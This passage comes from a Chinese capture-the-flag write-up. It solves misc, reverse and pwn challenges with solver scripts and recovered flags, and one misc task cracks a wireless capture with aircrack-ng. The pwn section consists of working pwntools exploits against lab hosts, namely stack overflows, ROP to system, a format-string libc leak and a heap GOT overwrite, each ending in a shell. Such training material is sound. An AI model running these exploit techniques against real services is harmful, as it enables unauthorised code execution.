flag = ""
for i in range(0,len(flagbin)/8):
b = flagbin[i*8:i*8+8]
flag += chr(int(b,2))
print flag
得到flag为:
flag{QRcode1sUseful}
misc7 摩尔斯电码 音频隐写
打开wav文件,听到滴滴的声音
估计是摩斯编码,仔细听但是听不出声音长短
使用cooledit或者audacity软件看波形的长度来判断声音的长短
写出摩尔斯电码
破解得到5BC925649CB0188F52E617D70929191C
flag{5BC925649CB0188F52E617D70929191C}
misc8 你真的了解base的原理吗?
下载文件后,发现有8MB,很明显这个base很大,用notepad或者其它类型的笔记本打开,发现是一种不常见的base85,所以不了解base的自然不知道。
提示说:四个python,所以说明这个要用脚本来爆破,可是base家族那么多,不知道具体是哪个,所以根本不好爆破,细节来了,题目说python,当通过用python 调用base64 这个模块的时候,发现这个模块允许的只有base16 32 64 和85才可以解码,且提示标注了4个python,所以基本确定这个码是通过这四个分别加密得到的。所以可以通过正则的匹配来进行爆破。附带脚本:
import re
import base64
with open('base_python.txt','r') as f:
decode = f.read()
try:
for i in range(30):
s = re.compile(r'[a-z]|[=]').findall(decode)
s1 = re.compile(r'[0189]').findall(decode)
s2 = re.compile(r'[,%;>|){:”’*?@<.(]').findall(decode)
if 'flag' in decode:
print(decode)
print(i)
break
elif (bool(s1) == False) and (bool(s2) ==False) :
decode = base64.b32decode(decode)
elif bool(s) == True and bool(s2) == False :
decode = base64.b64decode(decode)
elif bool(s2) == True:
decode = base64.b85decode(decode)
else :
decode = base64.b16decode(decode)
decode = str(decode, encoding='utf-8')
except:
print(decode)
f.close()
print(decode)
爆破后发现爆破出来的是:
flag{OTRhZTkyOTE0NmJiNGFjNWZhNDMzOTM1ZjkxYzg4Njk==}
提交并不是对的flag,也许是里面的也要解码,不了解base的人会认为这是base64,但是解码发现是错误的。所以这就考到了base的原理性了,发现里面的字符串的长度是45,而base64通常都是4的倍数,所以明显多了一个=,去掉=,在解码即可得到flag,即为:
flag{94ae929146bb4ac5fa433935f91c8869}
misc9 MIT 图片隐写
题目给了一张 gif 但是打不开 用 HXD 打开发现是文件头损坏
用010editor修补文件头增加GIF8修复后发现一张动图
将后面的 key base64 解密后得到密钥:ctfer2333
此外用 HXD 还发现这是个合并文件
所以用 binwalk 或者手动分解 得到一个 zip 解压得到 flag.png
这张图片采用 steganography 加密
密钥是之前获得的 ctfer2333 解密即得到 flag 在线的解密地址:http://www.atool.org/steganography.php
解出flag:
flag{Welc0me_T0_MIT}
misc10 无线密码破解+流量分析
将www.ivs复制到kali下,使用命令破解aircrack-ng www.ivs
里面就一个可破解的,SSID为ceshi
破解的密码是12345
使用这个密码打开rar压缩包,采用Wireshark打开,在HTTP中找到key
key{balabala}
misc11 Traffic_Light
我们看到后缀为pptx,就知道了这类文件可以通过改变后缀为zip,解压出pptx里面用到的相关资源。得到xiaoming.zip继续解压,有flag.zip和两个破解密文txt
第一部分:2053250813784316,通过中文电码解码得到密文为:我是密码
第二部分:看到一串类似于乱码我们猜测,文本文件改了BOM头。
010editor载入,发现BOM头为fffe,这是Unicode的,我们尝试改为big编码的feff:
修改之后打开文本文件,乱码恢复:我也是密码
我们拼接两份密码为:我是密码我也是密码。解压得到flag.txt
很明显这是base64,我们修复为ZmxhZ3twcHR4cG93ZXJwb2ludH0=,得到
sssssssssssssssssssssssssssflag{pptxpowerpoint}
flag{pptxpowerpoint}
misc12 日志审计
首先找出日志中黑客进行攻击的日志
发现有flag.php进行注入的指令
对指令进行url解码得到ASCII码
对ASCII码进行转换得到flag
flag{mayiyahei196}
python脚本:
#coding=utf-8
import re
#打开文件
with open('log','r') as file:
text = file.read()
#匹配ascii码
asclist = re.findall(r'%3D(\d+)-',text)
#print filelist
#将ascii码转换为字符
flag = ""
for i in range(0,len(asclist)):
flag += chr(int(asclist[i]))
#打印flag
print flag
flag{mayiyahei1965ae7569}
misc13 challenge 序列化
用010editor打开,看到有66,6c,61,67猜测是flag,复制出文本数据
写python脚本:
import re
strings = '''
0000h: 80 02 7D 71 00 28 4B 01 55 02 36 36 71 01 4B 02 €.}q.(K.U.66q.K.
0010h: 55 02 36 63 71 02 4B 03 55 02 36 31 71 03 4B 04 U.6cq.K.U.61q.K.
0020h: 55 02 36 37 71 04 4B 05 55 02 37 62 71 05 4B 06 U.67q.K.U.7bq.K.
0030h: 55 02 33 30 71 06 4B 07 55 02 36 31 71 07 4B 08 U.30q.K.U.61q.K.
0040h: 55 02 33 33 71 08 4B 09 55 02 36 32 71 09 4B 0A U.33q.K.U.62q.K.
0050h: 55 02 36 32 71 0A 4B 0B 55 02 33 36 71 0B 4B 0C U.62q.K.U.36q.K.
0060h: 55 02 36 32 71 0C 4B 0D 55 02 36 33 71 0D 4B 0E U.62q.K.U.63q.K.
0070h: 55 02 36 33 71 0E 4B 0F 55 02 33 32 71 0F 4B 10 U.63q.K.U.32q.K.
0080h: 55 02 33 33 71 10 4B 11 55 02 36 36 71 11 4B 12 U.33q.K.U.66q.K.
0090h: 55 02 33 39 71 12 4B 13 55 02 36 32 71 13 4B 14 U.39q.K.U.62q.K.
00A0h: 55 02 33 35 71 14 4B 15 55 02 33 33 71 15 4B 16 U.35q.K.U.33q.K.
00B0h: 55 02 37 64 71 16 75 2E U.7dq.u.
'''
reg = re.compile(r"U\.(.+?)q\.")
str_hex = re.findall(reg,strings)
print(str_hex)
flag = ""
for item in str_hex:
flag += chr(int(item,16))
print(flag)
flag{0a3bb6bcc23f9b53}
Reverse
reverse1 baby_reverse
将前三个字符 转化为ascii ,然后存放到一个数组里
得到了加密后的字符串, 接着查看encode()函数,看看它的加密算法
加密的过程是 将用户输入的字符串,拆分成了3组,每组进行异或和加减运算之后 累计到一个变量里,将这个变量跟enflag做比较。
python写一个脚本:
enflag=[0x7e,0x74,0x75,0x7f,0x67,0x63,0x24,0x63,0x60,0x65,0x74,0x6d,0x24,0x7d,0x43,0x25,0x7a,0x69]
v3=[]
v4=[]
v5=[]
v7=18
flag=''
for i in range(0,len(enflag),3):
v5.append((enflag[i]^v7)-6)
v4.append((enflag[i+1]^v7)+6)
v3.append(enflag[i+2]^v7^6)
for j in range(v7/3):
flag+=chr(v5[j])+chr(v4[j])+chr(v3[j])
print flag
flag{w0wtqly0uW1n}
reverse2 baby
用ida打开程序,看main程序,r转换
复制到kali存为a,命令输出flag
cat a |awk -F , '{printf $2}'|tr -d "'"|tr -d " "
flag{Re_1s_S0_C0OL}
flag{Re_1s_S0_C0oL}
reverse3 工程1
我们打开这个图片,得到如上提示,继续查看属性无任何提示。
我们binwalk以下看看
可以看到也并没有什么其他多余的文件,ZLIb以及LZMA一般可以忽视。
但是根据我的经验对于损坏的某些隐藏文件是无法binwalk出来的,于是我们用010edit打开它,查找png文件尾。
发现了并没有结束,5D5A9000这个明显是4D5A9000,被更改了exe文件头
但是我们同样在尾部发现了AE426082,出题人为了迷惑我们在混合文件的尾部又添加上了png文件的文件尾,让我们以为这只是一张图片,没有任何其他的文件。
我们利用010edit手工提取出来exe
可以发现这个应该是属于VB程序,我们只要猜对6次数据就可以获得flag,但是我们如果算一下概率是6的6次方,基本可以放弃。利用VBdecomplier进行反编译看源代码。 可以利用Cheatengine不断再次扫描,最后得到4个内存地址,把他们都改成6弹出了flag。
或者拖进od里,搜索字符串直接出现flag
flag{Y0uAreGoo5}
reverse4 re
Ida打开发现字符串YmxGY3s3MnMnYjd3Y2X5XWM5YfpoXWQkNSMlMzMnYjl9分析
这是一个简单的改了密码表的base64加密算法的逆向题
加密过程和标准的base64一样
只是密码表被换成了
/abcdefghIJKLMNOPQRSTUVWXYZABCDEFGijklmnopqrstuvwxyz0123456789+=
用python3脚本
#base64加解密脚本,自定义词典
# coding:utf-8
#s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
#s = "vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/"
s = "/abcdefghIJKLMNOPQRSTUVWXYZABCDEFGijklmnopqrstuvwxyz0123456789+="
def My_base64_encode(inputs):
# 将字符串转化为2进制
bin_str = []
for i in inputs:
x = str(bin(ord(i))).replace('0b', '')
bin_str.append('{:0>8}'.format(x))
#print(bin_str)
# 输出的字符串
outputs = ""
# 不够三倍数,需补齐的次数
nums = 0
while bin_str:
#每次取三个字符的二进制
temp_list = bin_str[:3]
if(len(temp_list) != 3):
nums = 3 - len(temp_list)
while len(temp_list) < 3:
temp_list += ['0' * 8]
temp_str = "".join(temp_list)
#print(temp_str)
# 将三个8字节的二进制转换为4个十进制
temp_str_list = []
for i in range(0,4):
temp_str_list.append(int(temp_str[i*6:(i+1)*6],2))
#print(temp_str_list)
if nums:
temp_str_list = temp_str_list[0:4 - nums]
for i in temp_str_list:
outputs += s[i]
bin_str = bin_str[3:]
outputs += nums * '='
print("Encrypted String:\n%s "%outputs)
def My_base64_decode(inputs):
# 将字符串转化为2进制
bin_str = []
for i in inputs:
if i != '=':
x = str(bin(s.index(i))).replace('0b', '')
bin_str.append('{:0>6}'.format(x))
#print(bin_str)
# 输出的字符串
outputs = ""
nums = inputs.count('=')
while bin_str:
temp_list = bin_str[:4]
temp_str = "".join(temp_list)
#print(temp_str)
# 补足8位字节
if(len(temp_str) % 8 != 0):
temp_str = temp_str[0:-1 * nums * 2]
# 将四个6字节的二进制转换为三个字符
for i in range(0,int(len(temp_str) / 8)):
outputs += chr(int(temp_str[i*8:(i+1)*8],2))
bin_str = bin_str[4:]
print("Decrypted String:\n%s "%outputs)
print()
print(" *************************************")
print(" * (1)encode (2)decode *")
print(" *************************************")
print()
num = input("Please select the operation you want to perform:\n")
if(num == "1"):
input_str = input("Please enter a string that needs to be encrypted: \n")
My_base64_encode(input_str)
else:
input_str = input("Please enter a string that needs to be decrypted: \n")
My_base64_decode(input_str)
Flag是
flag{76sgf17gf9asydjhatd93e73gf9}
reverse5 cut
### 题目:cut
##### 前言:这题是自己当时敲了2个钟C语言,搞出来的,是用于校赛招新小朋友的,因为要检测测试,还找人试着解了下,OK,起函数名有些头疼,就随意些啦,哈哈哈,莫见怪。
#### 开始分析:
首先拖进ida分析一波:
v7是我们的输入,然后可以改写成input,memset初始化不管,重点函数就是_substr666,0x233333和0x666666,还有0x8048000(嗯,认真点),v4是判断条件,看v4如果是1,就是成功congratulation,0就是失败tryagain~把v4改成check,于是:
这样就舒服些,首先进去_substr666看看是干嘛的,因为对input进行了操作:
a3是0,a4是6,a1是新申请的空间,看for循环,判断出是个复制函数,把input输入中下标从0到5的6个字符填充到a1中存起来,很清晰,这样就很清晰了,_substr666(存储数组,输入,起始下标,长度),就是个字符串裁剪函数嘛,于是很快懂了,substr666(v8, &input, 0, 6); substr666(v14, &input, 6, 1); substr666(v11, &input, 7, 6);就是把输入切割成了三段分别存到v8,v14和v11中。
接下来看if判断可以知道,要让check为1,那么3个if要同时满足条件,而且是对我们的输入切片进行处理的~
#### 先进第一关:
看到又是substr666这个切片函数,这次是str字符,我们去把它取出来:
str = vosng%_Ngemkt,看逻辑就是说对str切6个字节,下标从7开始,复制到s2中,然后分别对6位输入进行异或加密,存到s1中,比较s1和s2,相同即可,我们知道异或是可以解密的,这里不难。
#### 进入第二关:
这里很明显,就是把str的前面6个字节放到s再放到a2中,然后把输入进行加密存到v7中(简单的加减法加密),最后比较a2和v7的每一位,6位都相同即可,逆向的话也OK。
#### 最后第三关:
简单,就是判断第7个字符是不是等于“_”
这样解密脚本就可以写出来了,如下:
```c++
#include<iostream>
#include<cstring>
using namespace std;
//str = {vosng%_Ngemkt}
int main()
{
char input1[100] = {""};
char input2[100] = {""};
char input3[100] = {""};
char a[100] = {"vosng%"};
char b[100] = {"Ngemkt"};
for(int i = 0;i<strlen(b);i++)
{
input1[i] = char(int(b[i]^2)-4);
}
input2[0] = '_';
for(int i = 0;i<strlen(a);i++)
{
input3[i] = char(int(a[i])+1-i);
}
cout<<input1<<input2<<input3;
return 0;
}
```
跑出来是这个:
正确,再加个前缀,那么这一道题就完事了:
flag{Hacker_world!}
reverse6 reverse_3.exe
载入OD
搜索字符串
随意输入1111111111111111111
发现进行了base64加密
再向下单步 发现字符串
结合IDA看下
int sub_4156E0()
{
size_t v0;// eax@6
constchar*v1;// eax@6
size_t v2;// eax@9
char v4;// [sp+0h] [bp-188h]@6
char v5;// [sp+Ch] [bp-17Ch]@1
size_t v6;// [sp+10h] [bp-178h]@3
size_t j;// [sp+DCh] [bp-ACh]@6
size_t i;// [sp+E8h] [bp-A0h]@1
char Dest[108];// [sp+F4h] [bp-94h]@5
char Str;// [sp+160h] [bp-28h]@6
char v11;// [sp+17Ch] [bp-Ch]@6
unsignedint v12;// [sp+184h] [bp-4h]@1
int savedregs;// [sp+188h] [bp+0h]@1
memset(&v5,0xCCu,0x17Cu);
v12 =(unsignedint)&savedregs ^ __security_cookie;
for( i =0;(signedint)i <100;++i )
{
v6 = i;
if( i >=0x64)
sub_411154();
Dest[v6]=0;
}
sub_41132F("please enter the flag:", v4);
sub_411375("%20s",(unsignedint)&Str);
v0 = j_strlen(&Str);
v1 =(constchar*)sub_4110BE(&Str, v0,&v11);
strncpy(Dest, v1,'(');
sub_411127();
i = j_strlen(Dest);
for( j =0;(signedint)j <(signedint)i;++j )
Dest[j]+= j;
v2 = j_strlen(Dest);
strncmp(Dest, Str2, v2);
if( sub_411127())
sub_41132F("wrong flag!\n", v4);
else
sub_41132F("rigth flag!\n", v4);
sub_41126C(&savedregs,&dword_415890);
sub_411280();
return sub_411127();
}
分析可知:将输入的串Str1先进行base64加密 再与串Str2比较 若相等 则输出"right flag"
由此,我们只需将Str2也就是"e3nifIH9b_C@n@dH"进行解密即可
Python脚本:
import base64
s ="e3nifIH9b_C@n@dH"
flag =""
for i in range(len(s)):
flag += chr(ord(s[i])- i)
flag = base64.b64decode(flag)
print(flag)
所以得到flag{i_l0ve_you}
reverse7 题目.bin
我们首先用winrar打开压缩包,发现了如下提示,估计是要自己创建一个破解压缩包的字典,通过对字母或数字进行base64加密,base85加密,base91加密,然后连接三种加密后的字符串,写在字典里,然后利用ARCHPR选择字典模式破解。
我们写了如下脚本:
import base64
import base91
a=''
b=''
c=''
d=''
with open('zidian.txt', 'w') as f:
for i in range(0,9999):
a=base64.b64encode(str(i).encode('utf-8'))
a=str(a)
a=a[2:-1]
b=base64.b85encode(str(i).encode("utf-8"))
b=str(b)
b=b[2:-1]
c=base91.encode(str(i).encode("utf-8"))
d=str(a)+str(b)+str(c)
f.write(d+"\r\n")
#print(d)
我们猜测它是数字不超过四位,所以形成如上脚本,但是需要注意的是,似乎python2.X是没有base85加密解密方法的,所以需要升级到python3以上,但是还需要base91,于是我们上GitHub下载了别人的base91.py来导入使用。如下为生成的爆破字典。
接下来使用ARCHPR字典模式来爆破,将压缩包拖入软件,字典文件选择自己生成的txt。
我们得到了口令,很明显如果直接暴力破解不知道得多久。
NjAwOA==HZU+a3tVEO
我们得到一个名为题目.bin的文件,直接用记事本打开发现了它是010edit以16进制导出的base64形式的文件,所以我们可以直接用010导入。
我们导入之后可以看出是正常的exe文件,但是我们需要将它导出为exe,最后少了四个0也要补上。
得到一个vb程序,如下:
我们根据提示知道只要计算出一道3位数+3位数就可以得到flag,然而我们实际操作之后,发现速度根本来不及,它有计时,超过时间就失败,而且更坑的是只让你输入两位数,这样永远对不了。所以我们直接上IDA.
但是对于VB,ida看不到伪代码,所以我们直接看汇编,找到出flag处。
很明显这题跟异或加密有关。写得解FLAG的python代码,如下:
a='fpceyvb3qgcq;sus'
k=0
y=''
for i in a:
y=y+chr((((ord(i)-1)^5))^6)
print(y)
得到flag为:flag{vb1seas9qwq}
reverse8 babybaseX
# babybaseX Writeup
> 主要考察base family中的base58编码
但是给的表是打乱的具有迷惑性的`vrYenHCzNgu7FRTDbLiqtBpQZoUS3f5dKWsaM8Gm1EyVJkjw4cA6X92Pxh0OLl+/ `,在base58后加入了base64的`0OLl+/`部分,但其实并不会用到这六个字符同时在题目中也未明确出现58字样,而是通过`int base = *(pbegin+1)-*pbegin+25; `隐式给出了base,所以在写base解码的时候不能直接写出base58,而是需要测试base的值,最终得到与加密后结果`gmJNxnNCPChRefqDYSU1KZ`相同的输入,即为flag。
base58解码的writeup如下:
```shell
#include <iostream>
#include <vector>
#include <assert.h>
#include <string.h>
#include <iomanip> // std::setw
static const char* pszBase58 = "vrYenHCzNgu7FRTDbLiqtBpQZoUS3f5dKWsaM8Gm1EyVJkjw4cA6X92Pxh0OLl+/";
bool DecodeBase58(const char* psz, std::vector<unsigned char>& vch)
{
// Skip leading spaces.
while (*psz && isspace(*psz))
psz++;
// Skip and count leading '1's.
int zeroes = 0;
int length = 0;
while (*psz == '1') {
zeroes++;
psz++;
}
// Allocate enough space in big-endian base256 representation.
int size = strlen(psz) * 733 /1000 + 1; // log(58) / log(256), rounded up.
std::vector<unsigned char> b256(size);
// Process the characters.
while (*psz && !isspace(*psz)) {
// Decode base58 character
const char* ch = strchr(pszBase58, *psz);
if (ch == nullptr)
return false;
// Apply "b256 = b256 * 58 + ch".
int carry = ch - pszBase58;
int i = 0;
for (std::vector<unsigned char>::reverse_iterator it = b256.rbegin(); (carry != 0 || i < length) && (it != b256.rend()); ++it, ++i) {
carry += 58 * (*it);
*it = carry % 256;
carry /= 256;
}
assert(carry == 0);
length = i;
psz++;
}
// Skip trailing spaces.
while (isspace(*psz))
psz++;
if (*psz != 0)
return false;
// Skip leading zeroes in b256.
std::vector<unsigned char>::iterator it = b256.begin() + (size - length);
while (it != b256.end() && *it == 0)
it++;
vch.reserve(zeroes + (b256.end() - it));
vch.assign(zeroes, 0x00);
while (it != b256.end())
vch.push_back(*(it++));
return true;
}
bool DecodeBase58(const std::string& str, std::vector<unsigned char>& vchRet)
{
return DecodeBase58(str.c_str(), vchRet);
}
int main(int argc, char* argv[]){
std::string encode="gmJNxnNCPChRefqDYSU1KZ";
std::vector<unsigned char> decode;
DecodeBase58(encode, decode);
std::cout<<"Decode: ";
for(std::vector<unsigned char>::iterator iter = decode.begin(); iter != decode.end(); ++iter)
{
std::cout<<*iter;
}
std::cout<<std::endl;
return 0;
}
```
flag:flag{NowYouKnowBa5358}
Pwn
pwn1 baby_reverse
kali终端输入nc 192.168.1.101 9001
连上后直接ls
cat flag
flag{1823618491237087312321}
pwn2 stack1
#encoding:utf-8
#!/upr/bin/env python
from pwn import *
#p = process("./stack1")
p = remote("192.168.1.101","9002")
getshell=0x400751
payload = "a"*0x38+p64(getshell)
p.send(payload)
p.interactive()
flag{18o02el237087312321}
pwn3 stack2
#encoding:utf-8
#!/upr/bin/env python
from pwn import *
p = remote("192.168.1.113","9003")
#p = process("./stack2")
p.recvuntil("Come on,try to pwn me\n")
pop_rdi_ret=0x4007d3
arg=0x60111F
system=0x400570
payload = "a"*0x18+p64(pop_rdi_ret)+p64(arg)+p64(system)
p.send(payload)
p.interactive()
flag{18o02e09lkn332312321}
pwn4 human
#encoding:utf-8
#!/upr/bin/env python
from pwn import *
#context.log_level = "debug"
#p = process("./human")
p = remote("192.168.1.113","9004")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p.recvuntil("人类的本质是什么?\n")
payload="%11$p"
p.send(payload)
p.recv()
libc_main_ret =int(p.recv(14),16)-240
print "libc_main_ret-->",hex(libc_main_ret)
libc_base=libc_main_ret-libc.sym["__libc_start_main"]
one = libc_base +0xf1147#0xf02a4
print "libc-->",hex(libc_base)
print "one-->",hex(one)
p.recvuntil("人类还有什么本质?\n")
benzhi="真香鸽子"
main = 0x4007b6
payload=benzhi+(0x20-len(benzhi))*"a"+"b"*8+p64(one)
#gdb.attach(p,"b printf")
#pause()
p.send(payload)
#pause()
p.interactive()
flag{18o02e09l0oplksgfm72321}
Pwn5 heap1
#encoding:utf-8
from pwn import *
#context(os="linux", arch="amd64",log_level = "debug")
ip ="192.168.1.113"
if ip:
p = remote(ip,9005)
else:
p = process("./heap1")#, aslr=0
elf = ELF("./heap1")
#libc = ELF("./libc-2.23.so")
libc = elf.libc
#-------------------------------------
def sl(s):
p.sendline(s)
def sd(s):
p.send(s)
def rc(timeout=0):
if timeout == 0:
return p.recv()
else:
return p.recv(timeout=timeout)
def ru(s, timeout=0):
if timeout == 0:
return p.recvuntil(s)
else:
return p.recvuntil(s, timeout=timeout)
def debug(msg=''):
gdb.attach(p,'')
pause()
def getshell():
p.interactive()
#-------------------------------------
def create(size,contant):
ru("input your choice :")
sl("1")
ru("input the size of note :")
sl(str(size))
ru("Content of note:")
sd(contant)
def edit(Index,contant):
ru("input your choice :")
sl("2")
ru("input the id of note :")
sl(str(Index))
ru("input your note : ")
sd(contant)
def show(Index):
ru("input your choice :")
sl("3")
ru("input the id of note :")
sl(str(Index))
def delete(Index):
ru("input your choice :")
sl("4")
ru("input the id of note :")
sl(str(Index))
free_got = elf.got["free"]
print "free_got------>"+hex(free_got)
create(0x18,"a"*8)
create(0x10,"b"*8)
edit(0,"/bin/sh\x00"+"a"*0x10+p64(0x41))
#debug()
delete(1)
create(0x30,p64(0)*4+p64(0x30)+p64(free_got))
show(1)
ru("Content : ")
free = u64(p.recv(6).ljust(8,"\x00"))
libc_base = free- libc.symbols["free"]
system = libc_base+libc.symbols["system"]
print "free------>"+hex(free)
print "libc_base------>"+hex(libc_base)
edit(1,p64(system))
delete(0)
getshell()
#debug()
Pwn6 f4n_pwn
from pwn import *
#context.log_level = 'debug'
#p = process('./f4n_pwn')
p = remote('192.168.1.113',9006)
p.recvuntil('length : ')
p.sendline('-1')
payload = 'a'*0x57 + p32(0x080486BB)
p.recvuntil('name : \n')
p.sendline(payload)
p.interactive()
flag{18o02e97066skdja8sgfm72321}
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